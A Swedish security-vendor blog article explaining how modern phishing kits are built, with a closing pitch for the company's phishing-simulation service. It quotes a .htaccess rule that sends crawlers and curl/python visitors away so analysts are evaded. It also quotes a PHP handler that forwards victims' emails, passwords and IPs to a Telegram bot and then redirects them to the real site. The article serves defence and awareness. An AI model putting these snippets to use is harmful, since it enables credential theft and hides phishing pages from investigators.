← Alla artiklar

Anatomin hos ett modernt nätfiskekit

GottaPhish Team · April 22, 2026

Ett ”nätfiskekit” är den paketerade, återanvändbara kodbas som angripare rullar ut för att klona en inloggningssida, skörda uppgifter och exfiltrera dem. Att förstå hur dessa kit är byggda — och hur de gömmer sig — gör det mycket lättare att upptäcka kampanjer tidigt och att bygga övertygande försvarssimuleringar.

Vad som ingår i ett kit

Ett typiskt kit är ett ZIP-arkiv som släpps på en kapad värd eller billig hosting. Strukturen är anmärkningsvärt konstant:

kit/
├── index.php            # den klonade landningssidan
├── login.php            # formulärhanterare: fångar + vidarebefordrar uppgifter
├── assets/              # exakta kopior av CSS, JS, loggor, typsnitt
├── config.php           # exfiltreringsmål (e-post, Telegram-bot, fjärr-URL)
├── antibots.php         # blocklistor för crawlrar, sandlådor, forskare
└── .htaccess            # omskrivningar, geo-/IP-filtrering, hotlink-skydd

Moderna kit säljs allt oftare ”som tjänst” (PhaaS — Phishing-as-a-Service), komplett med prenumerationspaneler, uppdateringar och support.

Klonen

Landningssidan är oftast en byte-för-byte-kopia av en riktig inloggningsskärm, tagen med en sidkopierare eller en headless-webbläsare. Två tecken är vanliga:

Avancerade kit proxyar den riktiga sajten i realtid (en adversary-in-the-middle-uppställning med verktyg som Evilginx), relärar offrets inmatning till den äkta servern och stjäl den resulterande sessionskakan — vilket besegrar de flesta MFA.

Anti-analyslager

Komponenten antibots är det som håller ett kit vid liv. Den filtrerar besökare innan nätfiskesidan serveras:

# utdrag ur .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]

Därför var en URL som för en SOC-analytiker ”ser död ut” fullt levande för offret några minuter tidigare.

Fångst och exfiltrering av uppgifter

Hanteraren validerar precis så mycket att det ser äkta ut och skickar sedan iväg datan. Exfiltreringskanaler, ungefär efter popularitet:

$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");

Lägg märke till den sista omdirigeringen: efter den ”misslyckade inloggningen” hamnar offret på den riktiga sajten, antar ett skrivfel, loggar in med framgång och anar ingenting.

Hosting och leverans

Kit föredrar engångsinfrastruktur: kapade WordPress-sajter, öppna omdirigeringar på betrodda domäner, nyregistrerade snarlika domäner och allt oftare legitima tjänster (Cloudflare Workers, IPFS, SharePoint, Google Docs) för att låna deras rykte. Leveransen parar kitet med ett bete — en faktura, en MFA-”omverifiering”, en avisering om delat dokument.

Försvarsdetektion

Signaler värda att jaga:

Den obekväma sanningen: ett välbyggt AiTM-kit besegrar MFA via sms och app genom att stjäla sessionstoken. Nätfiskeresistenta metoder — FIDO2 / passkeys — är den varaktiga lösningen.

Så hjälper GottaPhish

Moderna nätfiskekit gör vapen av exakta kloner och AiTM-sessionsstöld som till och med besegrar MFA via sms och app. GottaPhish och dess expertteam hjälper er att möta just det hotet: säkra, fullt granskade simuleringar som speglar riktiga kit — tokeniserade länkar, flöden för uppgiftsinfångning, AiTM-scenarier — med instrumentpaneler som visar vilka beten som fastnar och var MFA håller. Våra experter hjälper till med uppsättningen, utformar scenarier som återskapar dagens PhaaS-hantverk och hjälper er tolka resultaten som riktad utbildning och som konkreta signaler för detektionsteknik åt ert SOC.

Anatomin hos ett modernt nätfiskekit